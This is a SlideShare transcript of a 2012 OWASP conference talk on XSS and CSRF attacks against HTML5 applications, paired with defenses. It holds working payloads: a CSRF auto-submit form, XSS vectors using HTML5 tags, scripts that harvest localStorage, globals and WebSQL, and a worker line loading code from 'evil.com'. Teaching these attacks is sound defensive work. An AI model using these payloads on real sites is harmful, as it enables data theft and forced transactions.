Successfully reported this slideshow.

More Related Content

Viewers also liked

Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Shreeraj Shah
Html5 localstorage attack vectors
Shreeraj Shah
Advanced applications-architecture-threats
Blueinfy Solutions
Secure SDLC for Software
Shreeraj Shah
Assessment methodology and approach
Blueinfy Solutions
CSRF, ClickJacking & Open Redirect
Blueinfy Solutions
AppSec 2007 - .NET Web Services Hacking
Shreeraj Shah
Using & Abusing APIs: An Examination of the API Attack Surface
CA API Management
Top Ten Web Hacking Techniques – 2008
Jeremiah Grossman
Web Hacking
Information Technology
Mobile security chess board - attacks & defense
Blueinfy Solutions
Don't Drop the SOAP: Real World Web Service Testing for Web Hackers
Tom Eston
Owasp Top 10 And Security Flaw Root Causes
Marco Morana
Mobile code mining for discovery and exploits nullcongoa2013
Blueinfy Solutions
HTML5 hacking
Blueinfy Solutions
Session7-XSS & CSRF
zakieh alizadeh
Protecting Your APIs Against Attack & Hijack
CA API Management
Application fuzzing
Blueinfy Solutions
RSA Europe 2013 OWASP Training
Jim Manico

Similar to XSS and CSRF with HTML5

The Same-Origin Policy
Fabrizio Farinacci
Hacking Client Side Insecurities
amiable_indian
Top Ten Web Hacking Techniques of 2012
Jeremiah Grossman
Web Technologies (12/12): Web Application Security
Sabin Buraga
Browsers_SameOriginPolicy_CORS_ContentSecurityPolicy
subbul
Cracking Into Embedded Devices - HACK.LU 2K8
guest441c58b71
Securing AEM webapps by hacking them
Mikhail Egorov
Top 10 Web Hacks 2012
Matt Johansen
Web Security Threats and Solutions
Ivo Andreev
Tracing out Cross Site Scripting Vulnerabilities in Modern Scripts
Eswar Publications
Everybody loves html5,h4ck3rs too
Nahidul Kibria
Generic threats to mobile application
Vikrant Kansal
New web attacks-nethemba
OWASP (Open Web Application Security Project)
VolgaCTF 2012 разбор заданий
BlackFan
Code obfuscation, php shells & more
Mattias Geniar
Enterprise mobileapplicationsecurity
Venkat Alagarsamy
CNIT 129S Ch 4: Mapping the Application
Sam Bowne
Xss is more than a simple threat
Romanian Cyber Conference
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
Felipe Prado
Top 10 mobile security risks - Khổng Văn Cường
Võ Thái Lâm

More from Shreeraj Shah

Dom Hackking & Security - BlackHat Preso
Shreeraj Shah
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Shreeraj Shah
Hacking and Securing .NET Apps (Infosecworld)
Shreeraj Shah
Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Shreeraj Shah
Web Services Security Chess (RSA)
Shreeraj Shah
Advanced Web Hacking (EUSecWest 06)
Shreeraj Shah
Advanced Web Services Hacking (AusCERT 06)
Shreeraj Shah

Featured

What to Upload to SlideShare
SlideShare
Be A Great Product Leader (Amplify, Oct 2019)
Adam Nash
Trillion Dollar Coach Book (Bill Campbell)
Eric Schmidt
APIdays Paris 2019 - Innovation @ scale, APIs as Digital Factories' New Machi...
apidays
A few thoughts on work life-balance
Wim Vanderbauwhede
Is vc still a thing final
Mark Suster
The GaryVee Content Model
Gary Vaynerchuk
Mammalian Brain Chemistry Explains Everything
Loretta Breuning, PhD
Blockchain + AI + Crypto Economics Are We Creating a Code Tsunami?
Dinis Guarda
The AI Rush
Jean-Baptiste Dumont
AI and Machine Learning Demystified by Carol Smith at Midwest UX 2017
Carol Smith
10 facts about jobs in the future
Pew Research Center's Internet & American Life Project
Harry Surden - Artificial Intelligence and Law Overview
Harry Surden
Inside Google's Numbers in 2017
Rand Fishkin
Pinot: Realtime Distributed OLAP datastore
Kishore Gopalakrishna
How to Become a Thought Leader in Your Niche
Leslie Samuel
Visual Design with Data
Seth Familian
Designing Teams for Emerging Challenges
Aaron Irizarry
UX, ethnography and possibilities: for Libraries, Museums and Archives
Ned Potter
Winners and Losers - All the (Russian) President's Men
Ian Bremmer

Related Books

Free with a 14 day trial from Scribd

See all
The Future Is Faster Than You Think: How Converging Technologies Are Transforming Business, Industries, and Our Lives Peter H. Diamandis
(4.5/5)
Free
From Gutenberg to Google: The History of Our Future Tom Wheeler
(3.5/5)
Free
SAM: One Robot, a Dozen Engineers, and the Race to Revolutionize the Way We Build Jonathan Waldman
(5/5)
Free
Talk to Me: How Voice Computing Will Transform the Way We Live, Work, and Think James Vlahos
(4/5)
Free
So You Want to Start a Podcast: Finding Your Voice, Telling Your Story, and Building a Community That Will Listen Kristen Meinzer
(3.5/5)
Free
Bezonomics: How Amazon Is Changing Our Lives and What the World's Best Companies Are Learning from It Brian Dumaine
(4/5)
Free
No Filter: The Inside Story of Instagram Sarah Frier
(4.5/5)
Free
Autonomy: The Quest to Build the Driverless Car—And How It Will Reshape Our World Lawrence D. Burns
(5/5)
Free
Future Presence: How Virtual Reality Is Changing Human Connection, Intimacy, and the Limits of Ordinary Life Peter Rubin
(4/5)
Free
Live Work Work Work Die: A Journey into the Savage Heart of Silicon Valley Corey Pein
(4.5/5)
Free
Everybody Lies: Big Data, New Data, and What the Internet Can Tell Us About Who We Really Are Seth Stephens-Davidowitz
(4.5/5)
Free
Life After Google: The Fall of Big Data and the Rise of the Blockchain Economy George Gilder
(4/5)
Free
System Identification: Tutorials Presented at the 5th IFAC Symposium on Identification and System Parameter Estimation, F.R. Germany, September 1979 Elsevier Books Reference
(4/5)
Free
Energy Conservation in Buildings: The Achievement of 50% Energy Saving: An Environmental Challenge? Elsevier Books Reference
(4/5)
Free
Young Men and Fire: Twenty-fifth Anniversary Edition Norman Maclean
(4.5/5)
Free
Longitude: The True Story of a Lone Genius Who Solved the Greatest Scientific Problem of His Time Dava Sobel
(4/5)
Free

Related Audiobooks

Free with a 14 day trial from Scribd

See all
If Then: How the Simulmatics Corporation Invented the Future Jill Lepore
(4.5/5)
Free
A Brief History of Motion: From the Wheel, to the Car, to What Comes Next Tom Standage
(4/5)
Free
An Ugly Truth: Inside Facebook’s Battle for Domination Sheera Frenkel
(4.5/5)
Free
Spooked: The Trump Dossier, Black Cube, and the Rise of Private Spies Barry Meier
(4/5)
Free
Second Nature: Scenes from a World Remade Nathaniel Rich
(5/5)
Free
Test Gods: Virgin Galactic and the Making of a Modern Astronaut Nicholas Schmidle
(5/5)
Free
Driven: The Race to Create the Autonomous Car Alex Davies
(4.5/5)
Free
Dignity in a Digital Age: Making Tech Work for All of Us Ro Khanna
(4/5)
Free
Einstein's Fridge: How the Difference Between Hot and Cold Explains the Universe Paul Sen
(4.5/5)
Free
After Steve: How Apple Became a Trillion-Dollar Company and Lost its Soul Tripp Mickle
(4.5/5)
Free
User Friendly: How the Hidden Rules of Design Are Changing the Way We Live, Work, and Play Cliff Kuang
(4.5/5)
Free
Uncanny Valley: A Memoir Anna Wiener
(4/5)
Free
Blockchain: The Next Everything Stephen P. Williams
(4/5)
Free
Lean Out: The Truth About Women, Power, and the Workplace Marissa Orr
(4.5/5)
Free
A World Without Work: Technology, Automation, and How We Should Respond Daniel Susskind
(4.5/5)
Free
Bitcoin Billionaires: A True Story of Genius, Betrayal, and Redemption Ben Mezrich
(4.5/5)
Free

XSS and CSRF with HTML5

  1. XSS & CSRF with HTML5 Attack, Exploit and Defense Shreeraj Shah Blueinfy Solutions Pvt. Ltd. shreeraj.shah@blueinfy.net OWASP OWASP AppSecUSA 2012 Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation http://www.owasp.org
  2. http://shreeraj.blogspot.com http://shreeraj.blogspot.com shreeraj@blueinfy.com shreeraj@blueinfy.com http://www.blueinfy.com Who Am I? http://www.blueinfy.com Twitter --@shreeraj Twitter @shreeraj  Founder & Director  Blueinfy & iAppSecure Solutions Pvt. Ltd.  Past experience  Net Square (Founder), Foundstone (R&D/Consulting), Chase(Middleware), IBM (Domino Dev)  Interest  Web security research  Published research  Articles / Papers – Securityfocus, O’erilly, DevX, InformIT etc.  Tools – DOMScan, DOMTracer, wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc.  Advisories - .Net, Java servers etc.  Presented at Blackhat, RSA, InfoSecWorld, OSCON, OWASP, HITB, Syscan, DeepSec etc.  Books (Author)  Web 2.0 Security – Defending Ajax, RIA and SOA  Hacking Web Services  Web Hacking OWASP 2
  3. HTML5 VECTORS – ATTACK SURFACE OWASP 3
  4. HTML5 – Attacks on the rise … Evolution of HTML5  1991 – HTML started (plain and simple)  1996 – CSS & JavaScript (Welcome to world of XSS and browser security)  2000 – XHTML1 (Growing concerns and attacks on browsers)  2005 – AJAX, XHR, DOM – (Attack cocktail and surface expansion)  2009 – HTML5 (Here we go… new surface, architecture and defense) – HTML+CSS+JS OWASP 4
  5. Modern Browser Model Mobile HTML5 + CSS Silverlight Flash API (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage FileSystem XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS/Content-Sec Sandbox Core Policies OWASP 5
  6. HTML5 Architecture & Threat Model User Interface Cross Domain Application Sandbox (Origin – Policy ) HTML/CSS Single JavaScript Internet DOM/Page Application XHR Target DOM WebSockets Application Native Storage, WebSQL, IndexedDB Messaging APIs Geolocation and other FileSystem, Cache - APIs APIs OWASP 6
  7. CSRF WITH HTML5 OWASP 7
  8. CSRF Attack Vector ge Attacker’s a RF r’ sp s CS Site Authentication ke c nd Server tta r se a d it A ke ylo Vis t ac pa At CSRF Attack – with session Login Success – cookie set Success Web Store Database Client/Victim Application Server Browser Server Successful exploitation … •SOP bypass •Cookie Replay OWASP 8
  9. SOP bypass and Cookie Replay – Basic Type GET Request IMG SRC <img src="http://host/?command"> SCRIPT SRC <script src="http://host/?command"> IFRAME SRC <iframe src="http://host/?command"> POST Request <script type="text/javascript" language="JavaScript"> document.foo.submit(); </script> OWASP 9
  10. Streams – name/value pairs are gone … JSON XML JS-Script JS-Object JS-Array OWASP 10
  11. CSRF injection – splitting and forcing … <html> <body> <FORM NAME="buy" ENCTYPE="text/plain" action="http://trade.example.com/xmlrpc/trade.rem" METHOD="POST"> <input type="hidden" name='<?xml version' value='"1.0"? ><methodCall><methodName>stocks.buy</methodName><params><param ><value><string>MSFT</string></value></param><param><value><double>2 6</double></value></param></params></methodCall>'> </FORM> <script>document.buy.submit();</script> </body> </html> OWASP 11
  12. CSRF with XHR and CORS bypass Mobile HTML5 + CSS Silverlight Flash API (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 12
  13. XHR – Level 2 powering CSRF XHR object of HTML5 is very powerful Allows interesting features like cross origin request and binary upload/download xhr.responseType can be set to "text", "arraybuffer", "document“ and "blob“ Also, for posting data stream - DOMString, Document, FormData, Blob, File, ArrayBuffer etc… OWASP 13
  14. CORS & XHR – ingredients for CSRF Before HTML5 – Cross Domain was not possible through XHR (SOP applicable) HTML5 – allows cross origin calls with XHR-Level 2 calls CORS – Cross Origin Resource Sharing needs to be followed (Option/Preflight calls) Adding extra HTTP header (Access-Control-Allow- Origin and few others) OWASP 14
  15. CORS based HTTP Headers Request Origin Access-Control-Request-Method (preflight) Access-Control-Request-Headers (preflight) Response Access-Control-Allow-Origin Access-Control-Allow-Credentials Access-Control-Allow-Expose-Headers Access-Control-Allow-Max-Age (preflight) Access-Control-Allow-Allow-Methods (preflight) Access-Control-Allow-Allow-Headers (preflight) OWASP 15
  16. XHR – Stealth POST/GET CSRF – powered by CORS and XHR Hence, allow stealth channel and possible silent exploitation One way CSRF with any stream since XHR allows raw stream from browser (XML, JSON, Binary as well) Two way CSRF (POST and read both – in case of allow set to *) OWASP 16
  17. Exploiting the use case CORS preflight bypass – certain Content-Type bypass preflight HTTP Forcing cookie replay by “withCredentials” Internal network scanning and tunneling Information harvesting (internal crawling) Stealth browser shell – post XSS (Allow origin- *) Business functionality abuse (upload and binary streams) OWASP 17
  18. CSRF with XHR/HTML5 Authentication User Server establishing Session Login request (HTTPS) Session cookie Web Store Database Client/Victim Application Server Browser Server OWASP 18
  19. CSRF with XHR/HTML5 Browser using XHR Call Authentication JavaScript User making Server a buy over HTTP Placing an order (JSON services) Success Web Store Database Client/Victim Application Server Browser Server OWASP 19
  20. CSRF with XHR/HTML5 ge Attacker’s a RF r’ sp s CS Site Session is Authentication ke c nd Server tta r se a d still live – not it A ke ylo Vis t ac pa yet logged At out Web Store Database Client/Victim Application Server Browser Server Leveraging XHR Call • Content-type to avoid pre flight • “withCredentials” set to true OWASP 20
  21. CSRF & HTML5 OWASP 21
  22. CSRF with XHR/HTML5 ge Attacker’s a RF r’ sp s CS Site Authentication ke c nd Server tta r se a d it A ke ylo Vis t ac pa At XHR initiates HTTP buy request Success – cookie replayed Web Store Database Client/Victim Application Server Browser Server Hence, • Without victim’s consent or notice Got it • Stealth HTTP request generated • Silent Exploitation takes place OWASP 22
  23. CSRF & HTML5 OWASP 23
  24. CSRF with XHR/HTML5 Browser is having Form (multi-part) Business Authentication Server layer function of uploading Uploading bulk orders Success Web Store Database Client/Victim Application Server Browser Server OWASP 24
  25. CSRF/Upload - POC OWASP 25
  26. CSRF with XHR/HTML5 ge Attacker’s a RF r’ sp s CS Site Authentication ke c nd Server tta r se a d it A ke ylo Vis t ac pa At XHR initiates HTTP multi-part - Upload Success – cookie replayed Web Store Database Client/Victim Application Server Browser Server Hence, • Without victim’s consent or notice Got it • Stealth HTTP Upload takes place • Silent Exploitation… OWASP 26
  27. CSRF/Upload OWASP 27
  28. Internal Scan – not scan but crawl as well … Attacker’s Site Internet Internet CSRF Payload And stealth channel Client/Victim Intranet Intranet Browser Internal Web Internal HR Internal Web/App Mail Application Server OWASP 28
  29. Internal Scan for CORS OWASP 29
  30. Scan and Defend Scan and look for Content-Type checking on server side CORS policy scan Form and Upload with tokens or not Defense and Countermeasures Secure libraries for streaming HTML5/Web 2.0 content CSRF protections Stronger CORS implementation OWASP 30
  31. XSS WITH HTML5 OWASP 31
  32. XSS with HTML5 (tags, attributes and events) Mobile HTML5 + CSS Silverlight Flash API (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 32
  33. HTML5 – Tags/Attributes/Events Tags – media (audio/video), canvas (getImageData), menu, embed, buttons/commands, Form control (keys) Attributes – form, submit, autofocus, sandbox, manifest, rel etc. Events/Objects – Navigation (_self), Editable content, Drag-Drop APIs, pushState (History) etc. OWASP 33
  34. XSS variants Media tags Examples <video><source onerror="javascript:alert(1)“> <video onerror="javascript:alert(1)"><source> OWASP 34
  35. XSS variants Exploiting autofocus <input autofocus onfocus=alert(1)> <select autofocus onfocus=alert(1)> <textarea autofocus onfocus=alert(1)> <keygen autofocus onfocus=alert(1)> OWASP 35
  36. XSS variants Form & Button etc. <form id="test" /><button form="test" formaction="javascript:alert(1)">test <form><button formaction="javascript:alert(1)">test Etc … and more … Nice HTML5 XSS cheat sheet (http://html5sec.org/) OWASP 36
  37. Scan and Defend Scan and look for Reflected or Persistent XSS spots with HTML5 tags Defense and Countermeasures Have it added on your blacklist Standard XSS protections by encoding OWASP 37
  38. CSP in Action – HTML5 defense … Content Security Policy – Defending browser against possible post attack scenarios Based on Origin (SOP the key) Allows whitelisting mechanism for what “to do” and “not to do” It is possible to send back notification to application when violation takes place Implementation by extra HTTP headers [Brower to browser X-WebKit-CSP (S/C) X-Content-Security-Policy (F)] OWASP 38
  39. Blocking Scripts Content-Security-Policy: script-src 'self‘ Only allowing script from the self Other mechanism 'unsafe-inline' - blocking inline 'unsafe-eval‘ – blocking eval type calls Post XSS defense can be crafted OWASP 39
  40. Controlling Browser connect-src – Controlling WebSocket, XHR etc. frame-src – Source of the frame (ClickJacking) object-src – Flash, Silverlight etc. media-src – controlling audio and video img/style – image and style sources default-src https:; - locking over SSL only OWASP 40
  41. Example  Persistent XSS injected HTTP/1.1 200 OK Date: Wed, 12 Sep 2012 14:40:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-WebKit-CSP: script-src 'self' X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 6146 OWASP 41
  42. Storage extraction with XSS Mobile HTML5 + CSS Silverlight Flash API (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 42
  43. Web Storage Extraction Browser has one place to store data – Cookie (limited and replayed) HTML5 – Storage API provided (Local and Session) Can hold global scoped variables http://www.w3.org/TR/webstorage/ OWASP 43
  44. Web Storage Extraction It is possible to steal them through XSS or via JavaScript Session hijacking – HttpOnly of no use getItem and setItem calls XSS the box and scan through storage OWASP 44
  45. Blind storage enumeration if(localStorage.length){ console.log(localStorage.length) for(i in localStorage){ console.log(i) console.log(localStorage.getItem(i)); } } Above code allows all storage variable extraction OWASP 45
  46. File System Storage HTML5 provides virtual file system with filesystem APIs window.requestFileSystem = window.requestFileSystem || window.webkitRequestFileSystem; It becomes a full blown local system for application in sandbox It empowers application OWASP 46
  47. File System Storage It provides temporary or permanent file system function init() { window.requestFileSystem(window.TEMPORARY, 1024*1024, function(filesystem) { filesys = filesystem; }, catcherror); }  App can have full filesystem in place now. OWASP 47
  48. Sensitive information filesystem Assuming app is creating profile on local system OWASP 48
  49. Extraction through XSS Once have an entry point – game over! OWASP 49
  50. Single DOM/One Page App - XSS Applications run with “rich” DOM JavaScript sets several variables and parameters while loading – GLOBALS It has sensitive information and what if they are GLOBAL and remains during the life of application It can be retrieved with XSS HTTP request and response are going through JavaScripts (XHR) – what about those vars? OWASP 50
  51. Blind Enumeration for(i in window){ obj=window[i]; try{ if(typeof(obj)=="string"){ console.log(i); console.log(obj.toString()); } }catch(ex){} } OWASP 51
  52. Global Sensitive Information Extraction from DOM HTML5 apps running on Single DOM Having several key global variables, objects and array var arrayGlobals = ['my@email.com',"12141hewvsdr9321343423mjfdvint","t est.com"]; Post DOM based exploitation possible and harvesting all these values. OWASP 52
  53. Global Sensitive Information Extraction from DOM for(i in window){ obj=window[i]; if(obj!=null||obj!=undefined) var type = typeof(obj); if(type=="object"||type=="string") { console.log("Name:"+i) try{ my=JSON.stringify(obj); console.log(my) }catch(ex){} } } OWASP 53
  54. Scan and Defend Scan and look for Scanning storage Defense and Countermeasures Do not store sensitive information on localStorage and Globals XSS protection OWASP 54
  55. SQLi & Blind Enumeration through XSS Mobile HTML5 + CSS Silverlight Flash API (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 55
  56. SQL Injection WebSQL is part of HTML 5 specification, it provides SQL database to the browser itself. Allows one time data loading and offline browsing capabilities. Causes security concern and potential injection points. Methods and calls are possible OWASP 56
  57. SQL Injection Through JavaScript one can harvest entire local database. Example OWASP 57
  58. Blind WebSQL Enumeration var dbo; var table; var usertable; for(i in window){ obj = window[i]; try{ if(obj.constructor.name=="Database"){ dbo = obj; obj.transaction(function(tx){ tx.executeSql('SELECT name FROM sqlite_master WHERE type='table'', [],function(tx,results){ table=results; },null); }); } }catch(ex){} } if(table.rows.length>1) usertable=table.rows.item(1).name; OWASP 58
  59. Blind WebSQL Enumeration We will run through all objects and get object where constructor is “Database” We will make Select query directly to sqlite_master database We will grab 1st table leaving webkit table on 0th entry OWASP 59
  60. Blind WebSQL Enumeration OWASP 60
  61. Web Messaging and Worker Injection Mobile HTML5 + CSS Silverlight Flash API (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 61
  62. Web Messaging  HTML5 is having new interframe communication system called Web Messaging.  By postMessage() call parent frame/domain can call with the iframe  Iframe can be loaded on cross domain. Hence, create issues – data/information validation & data leakage by cross posting possible  worker.webkitPostMessage – faster transferable objects OWASP 62
  63. Web Messaging - Scenario If postMessage() is set to * so page can be loaded in iframe and messaging can be hijacked Also, origin is not set to fixed then again frame listen from any domian – again an issue Stream coming needs to be checked before innerHTML or eval() Iframe or Web Worker can glue two streams – same domain or cross domain OWASP 63
  64. Origin check OWASP 64
  65. Web Worker – Hacks! Web Workers allows threading into HTML pages using JavaScript No need to use JavaScript calls like setTimeout(), setInterval(), XMLHttpRequest, and event handlers Totally Async and well supported [initialize] var worker = new Worker('task.js'); [Messaging] worker.postMessage(); OWASP 65
  66. Web Worker – Hacks! Web Page Current DOM Web Worker XHR, Location, Navigator etc. JavaScript Runtime Browser Platform Background Thread on same Scope and Object – No DOM Access page - messaging Regex, Array, JSON etc… OWASP 66
  67. Web Worker – Hacks! Security issues It is not allowing to load cross domain worker scripts. (http:, https:,javascript:,data : -No) It has some typical issues  It allows the use of XHR. Hence, in-domain and CORS requests possible  It can cause DoS – if user get stream to run JavaScript in worker thread. Don’t have access to parent DOM though  Message validation needed – else DOM based XSS OWASP 67
  68. Web Worker – Hacks!  Exmaple <html> <button onclick="Read()">Read Last Message</button> <button onclick="stop()">Stop</button> <output id="result"></output> <script> function Read() { worker.postMessage({'cmd': 'read', 'msg': 'last'}); } function stop() { worker.postMessage({'cmd': 'stop', 'msg': 'stop it'}); alert("Worker stopped"); } var worker = new Worker('message.js'); worker.addEventListener('message', function(e) { document.getElementById('result').innerHTML = e.data; }, false); </script> </html> OWASP 68
  69. Web Workers – Hacks! Possible to cause XSS Running script Passing hidden payload Also, web workers can help in embedding silent running js file and can be controlled. Can be a tool for payload delivery and control within browser framework importScripts("http://evil.com/payload.js") – worker can run cross domain script OWASP 69
  70. Scan and Defend Scan and look for JavaScript scanning Messaging and Worker implementation DOM calls Use of eval(), document.* calls etc. Defense and Countermeasures Same origin listening is a must for messaging event Secure JavaScript coding OWASP 70
  71. APIs … HTML5 few other APIs are interesting from security standpoint File APIs – allows local file access and can mixed with ClickJacking and other attacks to gain client files. Drag-Drop APIs – exploiting self XSS and few other tricks, hijacking cookies …  Lot more to explore and defend… OWASP 71
  72. Resources/References http://www.html5rocks.com/en/ (Solid stuff) https://www.owasp.org/index.php/HTML5_Security _Cheat_Sheet (OWASP stuff) http://html5sec.org/ (Quick Cheat sheet) http://html5security.org/ (Good resources) http://blog.kotowicz.net/ (Interesting work) OWASP 72
  73. http://shreeraj.blogspot.com http://shreeraj.blogspot.com shreeraj@blueinfy.com shreeraj@blueinfy.com http://www.blueinfy.com http://www.blueinfy.com CONCLUSION AND QUESTIONS OWASP 73

×